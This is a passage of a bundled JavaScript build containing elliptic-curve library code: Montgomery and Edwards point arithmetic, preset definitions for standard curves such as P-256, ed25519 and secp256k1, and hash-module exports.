    // http://hyperelliptic.org/EFD/g1p/auto-montgom-xz.html#doubling-dbl-1987-m-3
    // 2M + 2S + 4A
    // A = X1 + Z1
    var a = this.x.redAdd(this.z);
    // AA = A^2
    var aa = a.redSqr();
    // B = X1 - Z1
    var b = this.x.redSub(this.z);
    // BB = B^2
    var bb = b.redSqr();
    // C = AA - BB
    var c = aa.redSub(bb);
    // X3 = AA * BB
    var nx = aa.redMul(bb);
    // Z3 = C * (BB + A24 * C)
    var nz = c.redMul(bb.redAdd(this.curve.a24.redMul(c)));
    return this.curve.point(nx, nz);
};
$7a4f1b7c0dc1f992$var$Point.prototype.add = function add() {
    throw new Error("Not supported on Montgomery curve");
};
$7a4f1b7c0dc1f992$var$Point.prototype.diffAdd = function diffAdd(p, diff) {
    // http://hyperelliptic.org/EFD/g1p/auto-montgom-xz.html#diffadd-dadd-1987-m-3
    // 4M + 2S + 6A
    // A = X2 + Z2
    var a = this.x.redAdd(this.z);
    // B = X2 - Z2
    var b = this.x.redSub(this.z);
    // C = X3 + Z3
    var c = p.x.redAdd(p.z);
    // D = X3 - Z3
    var d = p.x.redSub(p.z);
    // DA = D * A
    var da = d.redMul(a);
    // CB = C * B
    var cb = c.redMul(b);
    // X5 = Z1 * (DA + CB)^2
    var nx = diff.z.redMul(da.redAdd(cb).redSqr());
    // Z5 = X1 * (DA - CB)^2
    var nz = diff.x.redMul(da.redISub(cb).redSqr());
    return this.curve.point(nx, nz);
};
$7a4f1b7c0dc1f992$var$Point.prototype.mul = function mul(k) {
    var t = k.clone();
    var a = this; // (N / 2) * Q + Q
    var b = this.curve.point(null, null); // (N / 2) * Q
    var c = this; // Q
    for(var bits = []; t.cmpn(0) !== 0; t.iushrn(1))bits.push(t.andln(1));
    for(var i = bits.length - 1; i >= 0; i--)if (bits[i] === 0) {
        // N * Q + Q = ((N / 2) * Q + Q)) + (N / 2) * Q
        a = a.diffAdd(b, c);
        // N * Q = 2 * ((N / 2) * Q + Q))
        b = b.dbl();
    } else {
        // N * Q = ((N / 2) * Q + Q) + ((N / 2) * Q)
        b = a.diffAdd(b, c);
        // N * Q + Q = 2 * ((N / 2) * Q + Q)
        a = a.dbl();
    }
    return b;
};
$7a4f1b7c0dc1f992$var$Point.prototype.mulAdd = function mulAdd() {
    throw new Error("Not supported on Montgomery curve");
};
$7a4f1b7c0dc1f992$var$Point.prototype.jumlAdd = function jumlAdd() {
    throw new Error("Not supported on Montgomery curve");
};
$7a4f1b7c0dc1f992$var$Point.prototype.eq = function eq(other) {
    return this.getX().cmp(other.getX()) === 0;
};
$7a4f1b7c0dc1f992$var$Point.prototype.normalize = function normalize() {
    this.x = this.x.redMul(this.z.redInvm());
    this.z = this.curve.one;
    return this;
};
$7a4f1b7c0dc1f992$var$Point.prototype.getX = function getX() {
    // Normalize coordinates
    this.normalize();
    return this.x.fromRed();
};

});

parcelRequire.register("dqmX9", function(module, exports) {
"use strict";

var $gEVtY = parcelRequire("gEVtY");

var $jX0xT = parcelRequire("jX0xT");

var $dlqwk = parcelRequire("dlqwk");

var $hSu7V = parcelRequire("hSu7V");
var $9c5f8216d530af0e$var$assert = $gEVtY.assert;
function $9c5f8216d530af0e$var$EdwardsCurve(conf) {
    // NOTE: Important as we are creating point in Base.call()
    this.twisted = (conf.a | 0) !== 1;
    this.mOneA = this.twisted && (conf.a | 0) === -1;
    this.extended = this.mOneA;
    $hSu7V.call(this, "edwards", conf);
    this.a = new $jX0xT(conf.a, 16).umod(this.red.m);
    this.a = this.a.toRed(this.red);
    this.c = new $jX0xT(conf.c, 16).toRed(this.red);
    this.c2 = this.c.redSqr();
    this.d = new $jX0xT(conf.d, 16).toRed(this.red);
    this.dd = this.d.redAdd(this.d);
    $9c5f8216d530af0e$var$assert(!this.twisted || this.c.fromRed().cmpn(1) === 0);
    this.oneC = (conf.c | 0) === 1;
}
$dlqwk($9c5f8216d530af0e$var$EdwardsCurve, $hSu7V);
module.exports = $9c5f8216d530af0e$var$EdwardsCurve;
$9c5f8216d530af0e$var$EdwardsCurve.prototype._mulA = function _mulA(num) {
    if (this.mOneA) return num.redNeg();
    else return this.a.redMul(num);
};
$9c5f8216d530af0e$var$EdwardsCurve.prototype._mulC = function _mulC(num) {
    if (this.oneC) return num;
    else return this.c.redMul(num);
};
// Just for compatibility with Short curve
$9c5f8216d530af0e$var$EdwardsCurve.prototype.jpoint = function jpoint(x, y, z, t) {
    return this.point(x, y, z, t);
};
$9c5f8216d530af0e$var$EdwardsCurve.prototype.pointFromX = function pointFromX(x, odd) {
    x = new $jX0xT(x, 16);
    if (!x.red) x = x.toRed(this.red);
    var x2 = x.redSqr();
    var rhs = this.c2.redSub(this.a.redMul(x2));
    var lhs = this.one.redSub(this.c2.redMul(this.d).redMul(x2));
    var y2 = rhs.redMul(lhs.redInvm());
    var y = y2.redSqrt();
    if (y.redSqr().redSub(y2).cmp(this.zero) !== 0) throw new Error("invalid point");
    var isOdd = y.fromRed().isOdd();
    if (odd && !isOdd || !odd && isOdd) y = y.redNeg();
    return this.point(x, y);
};
$9c5f8216d530af0e$var$EdwardsCurve.prototype.pointFromY = function pointFromY(y, odd) {
    y = new $jX0xT(y, 16);
    if (!y.red) y = y.toRed(this.red);
    // x^2 = (y^2 - c^2) / (c^2 d y^2 - a)
    var y2 = y.redSqr();
    var lhs = y2.redSub(this.c2);
    var rhs = y2.redMul(this.d).redMul(this.c2).redSub(this.a);
    var x2 = lhs.redMul(rhs.redInvm());
    if (x2.cmp(this.zero) === 0) {
        if (odd) throw new Error("invalid point");
        else return this.point(this.zero, y);
    }
    var x = x2.redSqrt();
    if (x.redSqr().redSub(x2).cmp(this.zero) !== 0) throw new Error("invalid point");
    if (x.fromRed().isOdd() !== odd) x = x.redNeg();
    return this.point(x, y);
};
$9c5f8216d530af0e$var$EdwardsCurve.prototype.validate = function validate(point) {
    if (point.isInfinity()) return true;
    // Curve: A * X^2 + Y^2 = C^2 * (1 + D * X^2 * Y^2)
    point.normalize();
    var x2 = point.x.redSqr();
    var y2 = point.y.redSqr();
    var lhs = x2.redMul(this.a).redAdd(y2);
    var rhs = this.c2.redMul(this.one.redAdd(this.d.redMul(x2).redMul(y2)));
    return lhs.cmp(rhs) === 0;
};
function $9c5f8216d530af0e$var$Point(curve, x, y, z, t) {
    $hSu7V.BasePoint.call(this, curve, "projective");
    if (x === null && y === null && z === null) {
        this.x = this.curve.zero;
        this.y = this.curve.one;
        this.z = this.curve.one;
        this.t = this.curve.zero;
        this.zOne = true;
    } else {
        this.x = new $jX0xT(x, 16);
        this.y = new $jX0xT(y, 16);
        this.z = z ? new $jX0xT(z, 16) : this.curve.one;
        this.t = t && new $jX0xT(t, 16);
        if (!this.x.red) this.x = this.x.toRed(this.curve.red);
        if (!this.y.red) this.y = this.y.toRed(this.curve.red);
        if (!this.z.red) this.z = this.z.toRed(this.curve.red);
        if (this.t && !this.t.red) this.t = this.t.toRed(this.curve.red);
        this.zOne = this.z === this.curve.one;
        // Use extended coordinates
        if (this.curve.extended && !this.t) {
            this.t = this.x.redMul(this.y);
            if (!this.zOne) this.t = this.t.redMul(this.z.redInvm());
        }
    }
}
$dlqwk($9c5f8216d530af0e$var$Point, $hSu7V.BasePoint);
$9c5f8216d530af0e$var$EdwardsCurve.prototype.pointFromJSON = function pointFromJSON(obj) {
    return $9c5f8216d530af0e$var$Point.fromJSON(this, obj);
};
$9c5f8216d530af0e$var$EdwardsCurve.prototype.point = function point(x, y, z, t) {
    return new $9c5f8216d530af0e$var$Point(this, x, y, z, t);
};
$9c5f8216d530af0e$var$Point.fromJSON = function fromJSON(curve, obj) {
    return new $9c5f8216d530af0e$var$Point(curve, obj[0], obj[1], obj[2]);
};
$9c5f8216d530af0e$var$Point.prototype.inspect = function inspect() {
    if (this.isInfinity()) return "<EC Point Infinity>";
    return "<EC Point x: " + this.x.fromRed().toString(16, 2) + " y: " + this.y.fromRed().toString(16, 2) + " z: " + this.z.fromRed().toString(16, 2) + ">";
};
$9c5f8216d530af0e$var$Point.prototype.isInfinity = function isInfinity() {
    // XXX This code assumes that zero is always zero in red
    return this.x.cmpn(0) === 0 && (this.y.cmp(this.z) === 0 || this.zOne && this.y.cmp(this.curve.c) === 0);
};
$9c5f8216d530af0e$var$Point.prototype._extDbl = function _extDbl() {
    // hyperelliptic.org/EFD/g1p/auto-twisted-extended-1.html
    //     #doubling-dbl-2008-hwcd
    // 4M + 4S
    // A = X1^2
    var a = this.x.redSqr();
    // B = Y1^2
    var b = this.y.redSqr();
    // C = 2 * Z1^2
    var c = this.z.redSqr();
    c = c.redIAdd(c);
    // D = a * A
    var d = this.curve._mulA(a);
    // E = (X1 + Y1)^2 - A - B
    var e = this.x.redAdd(this.y).redSqr().redISub(a).redISub(b);
    // G = D + B
    var g = d.redAdd(b);
    // F = G - C
    var f = g.redSub(c);
    // H = D - B
    var h = d.redSub(b);
    // X3 = E * F
    var nx = e.redMul(f);
    // Y3 = G * H
    var ny = g.redMul(h);
    // T3 = E * H
    var nt = e.redMul(h);
    // Z3 = F * G
    var nz = f.redMul(g);
    return this.curve.point(nx, ny, nz, nt);
};
$9c5f8216d530af0e$var$Point.prototype._projDbl = function _projDbl() {
    // hyperelliptic.org/EFD/g1p/auto-twisted-projective.html
    //     #doubling-dbl-2008-bbjlp
    //     #doubling-dbl-2007-bl
    // and others
    // Generally 3M + 4S or 2M + 4S
    // B = (X1 + Y1)^2
    var b = this.x.redAdd(this.y).redSqr();
    // C = X1^2
    var c = this.x.redSqr();
    // D = Y1^2
    var d = this.y.redSqr();
    var nx;
    var ny;
    var nz;
    var e;
    var h;
    var j;
    if (this.curve.twisted) {
        // E = a * C
        e = this.curve._mulA(c);
        // F = E + D
        var f = e.redAdd(d);
        if (this.zOne) {
            // X3 = (B - C - D) * (F - 2)
            nx = b.redSub(c).redSub(d).redMul(f.redSub(this.curve.two));
            // Y3 = F * (E - D)
            ny = f.redMul(e.redSub(d));
            // Z3 = F^2 - 2 * F
            nz = f.redSqr().redSub(f).redSub(f);
        } else {
            // H = Z1^2
            h = this.z.redSqr();
            // J = F - 2 * H
            j = f.redSub(h).redISub(h);
            // X3 = (B-C-D)*J
            nx = b.redSub(c).redISub(d).redMul(j);
            // Y3 = F * (E - D)
            ny = f.redMul(e.redSub(d));
            // Z3 = F * J
            nz = f.redMul(j);
        }
    } else {
        // E = C + D
        e = c.redAdd(d);
        // H = (c * Z1)^2
        h = this.curve._mulC(this.z).redSqr();
        // J = E - 2 * H
        j = e.redSub(h).redSub(h);
        // X3 = c * (B - E) * J
        nx = this.curve._mulC(b.redISub(e)).redMul(j);
        // Y3 = c * E * (C - D)
        ny = this.curve._mulC(e).redMul(c.redISub(d));
        // Z3 = E * J
        nz = e.redMul(j);
    }
    return this.curve.point(nx, ny, nz);
};
$9c5f8216d530af0e$var$Point.prototype.dbl = function dbl() {
    if (this.isInfinity()) return this;
    // Double in extended coordinates
    if (this.curve.extended) return this._extDbl();
    else return this._projDbl();
};
$9c5f8216d530af0e$var$Point.prototype._extAdd = function _extAdd(p) {
    // hyperelliptic.org/EFD/g1p/auto-twisted-extended-1.html
    //     #addition-add-2008-hwcd-3
    // 8M
    // A = (Y1 - X1) * (Y2 - X2)
    var a = this.y.redSub(this.x).redMul(p.y.redSub(p.x));
    // B = (Y1 + X1) * (Y2 + X2)
    var b = this.y.redAdd(this.x).redMul(p.y.redAdd(p.x));
    // C = T1 * k * T2
    var c = this.t.redMul(this.curve.dd).redMul(p.t);
    // D = Z1 * 2 * Z2
    var d = this.z.redMul(p.z.redAdd(p.z));
    // E = B - A
    var e = b.redSub(a);
    // F = D - C
    var f = d.redSub(c);
    // G = D + C
    var g = d.redAdd(c);
    // H = B + A
    var h = b.redAdd(a);
    // X3 = E * F
    var nx = e.redMul(f);
    // Y3 = G * H
    var ny = g.redMul(h);
    // T3 = E * H
    var nt = e.redMul(h);
    // Z3 = F * G
    var nz = f.redMul(g);
    return this.curve.point(nx, ny, nz, nt);
};
$9c5f8216d530af0e$var$Point.prototype._projAdd = function _projAdd(p) {
    // hyperelliptic.org/EFD/g1p/auto-twisted-projective.html
    //     #addition-add-2008-bbjlp
    //     #addition-add-2007-bl
    // 10M + 1S
    // A = Z1 * Z2
    var a = this.z.redMul(p.z);
    // B = A^2
    var b = a.redSqr();
    // C = X1 * X2
    var c = this.x.redMul(p.x);
    // D = Y1 * Y2
    var d = this.y.redMul(p.y);
    // E = d * C * D
    var e = this.curve.d.redMul(c).redMul(d);
    // F = B - E
    var f = b.redSub(e);
    // G = B + E
    var g = b.redAdd(e);
    // X3 = A * F * ((X1 + Y1) * (X2 + Y2) - C - D)
    var tmp = this.x.redAdd(this.y).redMul(p.x.redAdd(p.y)).redISub(c).redISub(d);
    var nx = a.redMul(f).redMul(tmp);
    var ny;
    var nz;
    if (this.curve.twisted) {
        // Y3 = A * G * (D - a * C)
        ny = a.redMul(g).redMul(d.redSub(this.curve._mulA(c)));
        // Z3 = F * G
        nz = f.redMul(g);
    } else {
        // Y3 = A * G * (D - C)
        ny = a.redMul(g).redMul(d.redSub(c));
        // Z3 = c * F * G
        nz = this.curve._mulC(f).redMul(g);
    }
    return this.curve.point(nx, ny, nz);
};
$9c5f8216d530af0e$var$Point.prototype.add = function add(p) {
    if (this.isInfinity()) return p;
    if (p.isInfinity()) return this;
    if (this.curve.extended) return this._extAdd(p);
    else return this._projAdd(p);
};
$9c5f8216d530af0e$var$Point.prototype.mul = function mul(k) {
    if (this._hasDoubles(k)) return this.curve._fixedNafMul(this, k);
    else return this.curve._wnafMul(this, k);
};
$9c5f8216d530af0e$var$Point.prototype.mulAdd = function mulAdd(k1, p, k2) {
    return this.curve._wnafMulAdd(1, [
        this,
        p
    ], [
        k1,
        k2
    ], 2, false);
};
$9c5f8216d530af0e$var$Point.prototype.jmulAdd = function jmulAdd(k1, p, k2) {
    return this.curve._wnafMulAdd(1, [
        this,
        p
    ], [
        k1,
        k2
    ], 2, true);
};
$9c5f8216d530af0e$var$Point.prototype.normalize = function normalize() {
    if (this.zOne) return this;
    // Normalize coordinates
    var zi = this.z.redInvm();
    this.x = this.x.redMul(zi);
    this.y = this.y.redMul(zi);
    if (this.t) this.t = this.t.redMul(zi);
    this.z = this.curve.one;
    this.zOne = true;
    return this;
};
$9c5f8216d530af0e$var$Point.prototype.neg = function neg() {
    return this.curve.point(this.x.redNeg(), this.y, this.z, this.t && this.t.redNeg());
};
$9c5f8216d530af0e$var$Point.prototype.getX = function getX() {
    this.normalize();
    return this.x.fromRed();
};
$9c5f8216d530af0e$var$Point.prototype.getY = function getY() {
    this.normalize();
    return this.y.fromRed();
};
$9c5f8216d530af0e$var$Point.prototype.eq = function eq(other) {
    return this === other || this.getX().cmp(other.getX()) === 0 && this.getY().cmp(other.getY()) === 0;
};
$9c5f8216d530af0e$var$Point.prototype.eqXToP = function eqXToP(x) {
    var rx = x.toRed(this.curve.red).redMul(this.z);
    if (this.x.cmp(rx) === 0) return true;
    var xc = x.clone();
    var t = this.curve.redN.redMul(this.z);
    for(;;){
        xc.iadd(this.curve.n);
        if (xc.cmp(this.curve.p) >= 0) return false;
        rx.redIAdd(t);
        if (this.x.cmp(rx) === 0) return true;
    }
};
// Compatibility with BaseCurve
$9c5f8216d530af0e$var$Point.prototype.toP = $9c5f8216d530af0e$var$Point.prototype.normalize;
$9c5f8216d530af0e$var$Point.prototype.mixedAdd = $9c5f8216d530af0e$var$Point.prototype.add;

});


parcelRequire.register("fbTbW", function(module, exports) {
"use strict";
var $b0f2b206068f1378$var$curves = module.exports;

var $kiSKt = parcelRequire("kiSKt");

var $cP1GP = parcelRequire("cP1GP");

var $gEVtY = parcelRequire("gEVtY");
var $b0f2b206068f1378$var$assert = $gEVtY.assert;
function $b0f2b206068f1378$var$PresetCurve(options) {
    if (options.type === "short") this.curve = new $cP1GP.short(options);
    else if (options.type === "edwards") this.curve = new $cP1GP.edwards(options);
    else this.curve = new $cP1GP.mont(options);
    this.g = this.curve.g;
    this.n = this.curve.n;
    this.hash = options.hash;
    $b0f2b206068f1378$var$assert(this.g.validate(), "Invalid curve");
    $b0f2b206068f1378$var$assert(this.g.mul(this.n).isInfinity(), "Invalid curve, G*N != O");
}
$b0f2b206068f1378$var$curves.PresetCurve = $b0f2b206068f1378$var$PresetCurve;
function $b0f2b206068f1378$var$defineCurve(name, options) {
    Object.defineProperty($b0f2b206068f1378$var$curves, name, {
        configurable: true,
        enumerable: true,
        get: function() {
            var curve = new $b0f2b206068f1378$var$PresetCurve(options);
            Object.defineProperty($b0f2b206068f1378$var$curves, name, {
                configurable: true,
                enumerable: true,
                value: curve
            });
            return curve;
        }
    });
}
$b0f2b206068f1378$var$defineCurve("p192", {
    type: "short",
    prime: "p192",
    p: "ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff",
    a: "ffffffff ffffffff ffffffff fffffffe ffffffff fffffffc",
    b: "64210519 e59c80e7 0fa7e9ab 72243049 feb8deec c146b9b1",
    n: "ffffffff ffffffff ffffffff 99def836 146bc9b1 b4d22831",
    hash: $kiSKt.sha256,
    gRed: false,
    g: [
        "188da80e b03090f6 7cbf20eb 43a18800 f4ff0afd 82ff1012",
        "07192b95 ffc8da78 631011ed 6b24cdd5 73f977a1 1e794811"
    ]
});
$b0f2b206068f1378$var$defineCurve("p224", {
    type: "short",
    prime: "p224",
    p: "ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001",
    a: "ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff fffffffe",
    b: "b4050a85 0c04b3ab f5413256 5044b0b7 d7bfd8ba 270b3943 2355ffb4",
    n: "ffffffff ffffffff ffffffff ffff16a2 e0b8f03e 13dd2945 5c5c2a3d",
    hash: $kiSKt.sha256,
    gRed: false,
    g: [
        "b70e0cbd 6bb4bf7f 321390b9 4a03c1d3 56c21122 343280d6 115c1d21",
        "bd376388 b5f723fb 4c22dfe6 cd4375a0 5a074764 44d58199 85007e34"
    ]
});
$b0f2b206068f1378$var$defineCurve("p256", {
    type: "short",
    prime: null,
    p: "ffffffff 00000001 00000000 00000000 00000000 ffffffff ffffffff ffffffff",
    a: "ffffffff 00000001 00000000 00000000 00000000 ffffffff ffffffff fffffffc",
    b: "5ac635d8 aa3a93e7 b3ebbd55 769886bc 651d06b0 cc53b0f6 3bce3c3e 27d2604b",
    n: "ffffffff 00000000 ffffffff ffffffff bce6faad a7179e84 f3b9cac2 fc632551",
    hash: $kiSKt.sha256,
    gRed: false,
    g: [
        "6b17d1f2 e12c4247 f8bce6e5 63a440f2 77037d81 2deb33a0 f4a13945 d898c296",
        "4fe342e2 fe1a7f9b 8ee7eb4a 7c0f9e16 2bce3357 6b315ece cbb64068 37bf51f5"
    ]
});
$b0f2b206068f1378$var$defineCurve("p384", {
    type: "short",
    prime: null,
    p: "ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe ffffffff 00000000 00000000 ffffffff",
    a: "ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe ffffffff 00000000 00000000 fffffffc",
    b: "b3312fa7 e23ee7e4 988e056b e3f82d19 181d9c6e fe814112 0314088f 5013875a c656398d 8a2ed19d 2a85c8ed d3ec2aef",
    n: "ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff c7634d81 f4372ddf 581a0db2 48b0a77a ecec196a ccc52973",
    hash: $kiSKt.sha384,
    gRed: false,
    g: [
        "aa87ca22 be8b0537 8eb1c71e f320ad74 6e1d3b62 8ba79b98 59f741e0 82542a38 5502f25d bf55296c 3a545e38 72760ab7",
        "3617de4a 96262c6f 5d9e98bf 9292dc29 f8f41dbd 289a147c e9da3113 b5f0b8c0 0a60b1ce 1d7e819d 7a431d7c 90ea0e5f"
    ]
});
$b0f2b206068f1378$var$defineCurve("p521", {
    type: "short",
    prime: null,
    p: "000001ff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff",
    a: "000001ff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffc",
    b: "00000051 953eb961 8e1c9a1f 929a21a0 b68540ee a2da725b 99b315f3 b8b48991 8ef109e1 56193951 ec7e937b 1652c0bd 3bb1bf07 3573df88 3d2c34f1 ef451fd4 6b503f00",
    n: "000001ff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffa 51868783 bf2f966b 7fcc0148 f709a5d0 3bb5c9b8 899c47ae bb6fb71e 91386409",
    hash: $kiSKt.sha512,
    gRed: false,
    g: [
        "000000c6 858e06b7 0404e9cd 9e3ecb66 2395b442 9c648139 053fb521 f828af60 6b4d3dba a14b5e77 efe75928 fe1dc127 a2ffa8de 3348b3c1 856a429b f97e7e31 c2e5bd66",
        "00000118 39296a78 9a3bc004 5c8a5fb4 2c7d1bd9 98f54449 579b4468 17afbd17 273e662c 97ee7299 5ef42640 c550b901 3fad0761 353c7086 a272c240 88be9476 9fd16650"
    ]
});
$b0f2b206068f1378$var$defineCurve("curve25519", {
    type: "mont",
    prime: "p25519",
    p: "7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed",
    a: "76d06",
    b: "1",
    n: "1000000000000000 0000000000000000 14def9dea2f79cd6 5812631a5cf5d3ed",
    hash: $kiSKt.sha256,
    gRed: false,
    g: [
        "9"
    ]
});
$b0f2b206068f1378$var$defineCurve("ed25519", {
    type: "edwards",
    prime: "p25519",
    p: "7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed",
    a: "-1",
    c: "1",
    // -121665 * (121666^(-1)) (mod P)
    d: "52036cee2b6ffe73 8cc740797779e898 00700a4d4141d8ab 75eb4dca135978a3",
    n: "1000000000000000 0000000000000000 14def9dea2f79cd6 5812631a5cf5d3ed",
    hash: $kiSKt.sha256,
    gRed: false,
    g: [
        "216936d3cd6e53fec0a4e231fdd6dc5c692cc7609525a7b2c9562d608f25d51a",
        // 4/5
        "6666666666666666666666666666666666666666666666666666666666666658"
    ]
});
var $b0f2b206068f1378$var$pre;

try {
    $b0f2b206068f1378$var$pre = (parcelRequire("lNVWe"));
} catch (e) {
    $b0f2b206068f1378$var$pre = undefined;
}
$b0f2b206068f1378$var$defineCurve("secp256k1", {
    type: "short",
    prime: "k256",
    p: "ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f",
    a: "0",
    b: "7",
    n: "ffffffff ffffffff ffffffff fffffffe baaedce6 af48a03b bfd25e8c d0364141",
    h: "1",
    hash: $kiSKt.sha256,
    // Precomputed endomorphism
    beta: "7ae96a2b657c07106e64479eac3434e99cf0497512f58995c1396c28719501ee",
    lambda: "5363ad4cc05c30e0a5261c028812645a122e22ea20816678df02967c1b23bd72",
    basis: [
        {
            a: "3086d221a7d46bcde86c90e49284eb15",
            b: "-e4437ed6010e88286f547fa90abfe4c3"
        },
        {
            a: "114ca50f7a8e2f3f657c1108d9d44cfd8",
            b: "3086d221a7d46bcde86c90e49284eb15"
        }
    ],
    gRed: false,
    g: [
        "79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798",
        "483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8",
        $b0f2b206068f1378$var$pre
    ]
});

});
parcelRequire.register("kiSKt", function(module, exports) {
var $ec7ff5071b027891$var$hash = module.exports;

$ec7ff5071b027891$var$hash.utils = (parcelRequire("btcbI"));

$ec7ff5071b027891$var$hash.common = (parcelRequire("aAb7n"));

$ec7ff5071b027891$var$hash.sha = (parcelRequire("2wnQk"));

$ec7ff5071b027891$var$hash.ripemd = (parcelRequire("05eZB"));

$ec7ff5071b027891$var$hash.hmac = (parcelRequire("ap2lu"));
// Proxy hash functions to the main object
$ec7ff5071b027891$var$hash.sha1 = $ec7ff5071b027891$var$hash.sha.sha1;
$ec7ff5071b027891$var$hash.sha256 = $ec7ff5071b027891$var$hash.sha.sha256;
$ec7ff5071b027891$var$hash.sha224 = $ec7ff5071b027891$var$hash.sha.sha224;
$ec7ff5071b027891$var$hash.sha384 = $ec7ff5071b027891$var$hash.sha.sha384;
$ec7ff5071b027891$var$hash.sha512 = $ec7ff5071b027891$var$hash.sha.sha512;
$ec7ff5071b027891$var$hash.ripemd160 = $ec7ff5071b027891$var$hash.ripemd.ripemd160;

});
parcelRequire.register("btcbI", function(module, exports) {

$parcel$export(module.exports, "inherits", () => $859bdb699f0f4e15$export$69f1b2dcda23c5f8, (v) => $859bdb699f0f4e15$export$69f1b2dcda23c5f8 = v);
$parcel$export(module.exports, "toArray", () => $859bdb699f0f4e15$export$45b10814cc054894, (v) => $859bdb699f0f4e15$export$45b10814cc054894 = v);
$parcel$export(module.exports, "toHex", () => $859bdb699f0f4e15$export$7ea66e3774a60b67, (v) => $859bdb699f0f4e15$export$7ea66e3774a60b67 = v);
$parcel$export(module.exports, "htonl", () => $859bdb699f0f4e15$export$34a52f00f601f6f1, (v) => $859bdb699f0f4e15$export$34a52f00f601f6f1 = v);
$parcel$export(module.exports, "toHex32", () => $859bdb699f0f4e15$export$812b0cbd5e8a72ab, (v) => $859bdb699f0f4e15$export$812b0cbd5e8a72ab = v);
$parcel$export(module.exports, "zero2", () => $859bdb699f0f4e15$export$f24f9e11d63bb314, (v) => $859bdb699f0f4e15$export$f24f9e11d63bb314 = v);
$parcel$export(module.exports, "zero8", () => $859bdb699f0f4e15$export$b71357c7e07ca1f1, (v) => $859bdb699f0f4e15$export$b71357c7e07ca1f1 = v);
$parcel$export(module.exports, "join32", () => $859bdb699f0f4e15$export$2e58a4b541fdcbe8, (v) => $859bdb699f0f4e15$export$2e58a4b541fdcbe8 = v);
$parcel$export(module.exports, "split32", () => $859bdb699f0f4e15$export$183b950bde9faab8, (v) => $859bdb699f0f4e15$export$183b950bde9faab8 = v);
$parcel$export(module.exports, "rotr32", () => $859bdb699f0f4e15$export$4785c77169fea59e, (v) => $859bdb699f0f4e15$export$4785c77169fea59e = v);
$parcel$export(module.exports, "rotl32", () => $859bdb699f0f4e15$export$242a185dfcffac5b, (v) => $859bdb699f0f4e15$export$242a185dfcffac5b = v);
$parcel$export(module.exports, "sum32", () => $859bdb699f0f4e15$export$58c04ae0ae31877d, (v) => $859bdb699f0f4e15$export$58c04ae0ae31877d = v);
$parcel$export(module.exports, "sum32_3", () => $859bdb699f0f4e15$export$d058ca695f8c6f11, (v) => $859bdb699f0f4e15$export$d058ca695f8c6f11 = v);
$parcel$export(module.exports, "sum32_4", () => $859bdb699f0f4e15$export$a1efd7fc3e986367, (v) => $859bdb699f0f4e15$export$a1efd7fc3e986367 = v);
$parcel$export(module.exports, "sum32_5", () => $859bdb699f0f4e15$export$bbfea4a2b5abaab4, (v) => $859bdb699f0f4e15$export$bbfea4a2b5abaab4 = v);
$parcel$export(module.exports, "sum64", () => $859bdb699f0f4e15$export$97ad4afc7de86152, (v) => $859bdb699f0f4e15$export$97ad4afc7de86152 = v);
$parcel$export(module.exports, "sum64_hi", () => $859bdb699f0f4e15$export$ce4673d9a79f6a4b, (v) => $859bdb699f0f4e15$export$ce4673d9a79f6a4b = v);
$parcel$export(module.exports, "sum64_lo", () => $859bdb699f0f4e15$export$786cc99fc6eedc0b, (v) => $859bdb699f0f4e15$export$786cc99fc6eedc0b = v);
$parcel$export(module.exports, "sum64_4_hi", () => $859bdb699f0f4e15$export$45c59b9a1848dd0, (v) => $859bdb699f0f4e15$export$45c59b9a1848dd0 = v);
$parcel$export(module.exports, "sum64_4_lo", () => $859bdb699f0f4e15$export$50d8f613e76d3034, (v) => $859bdb699f0f4e15$export$50d8f613e76d3034 = v);
$parcel$export(module.exports, "sum64_5_hi", () => $859bdb699f0f4e15$export$b8e83683c60ee162, (v) => $859bdb699f0f4e15$export$b8e83683c60ee162 = v);
$parcel$export(module.exports, "sum64_5_lo", () => $859bdb699f0f4e15$export$aeeb51790d1bcc4a, (v) => $859bdb699f0f4e15$export$aeeb51790d1bcc4a = v);
$parcel$export(module.exports, "rotr64_hi", () => $859bdb699f0f4e15$export$bb7c616f719ad9c, (v) => $859bdb699f0f4e15$export$bb7c616f719ad9c = v);
$parcel$export(module.exports, "rotr64_lo", () => $859bdb699f0f4e15$export$4d63290824f9d7df, (v) => $859bdb699f0f4e15$export$4d63290824f9d7df = v);
$parcel$export(module.exports, "shr64_hi", () => $859bdb699f0f4e15$export$2f64ceb90ef28ea1, (v) => $859bdb699f0f4e15$export$2f64ceb90ef28ea1 = v);
$parcel$export(module.exports, "shr64_lo", () => $859bdb699f0f4e15$export$8d2089d465f6d10d, (v) => $859bdb699f0f4e15$export$8d2089d465f6d10d = v);
var $859bdb699f0f4e15$export$69f1b2dcda23c5f8;
var $859bdb699f0f4e15$export$45b10814cc054894;
var $859bdb699f0f4e15$export$7ea66e3774a60b67;
var $859bdb699f0f4e15$export$34a52f00f601f6f1;
var $859bdb699f0f4e15$export$812b0cbd5e8a72ab;
var $859bdb699f0f4e15$export$f24f9e11d63bb314;
var $859bdb699f0f4e15$export$b71357c7e07ca1f1;
var $859bdb699f0f4e15$export$2e58a4b541fdcbe8;
var $859bdb699f0f4e15$export$183b950bde9faab8;
var $859bdb699f0f4e15$export$4785c77169fea59e;
var $859bdb699f0f4e15$export$242a185dfcffac5b;
var $859bdb699f0f4e15$export$58c04ae0ae31877d;
var $859bdb699f0f4e15$export$d058ca695f8c6f11;
var $859bdb699f0f4e15$export$a1efd7fc3e986367;
var $859bdb699f0f4e15$export$bbfea4a2b5abaab4;
var $859bdb699f0f4e15$export$97ad4afc7de86152;
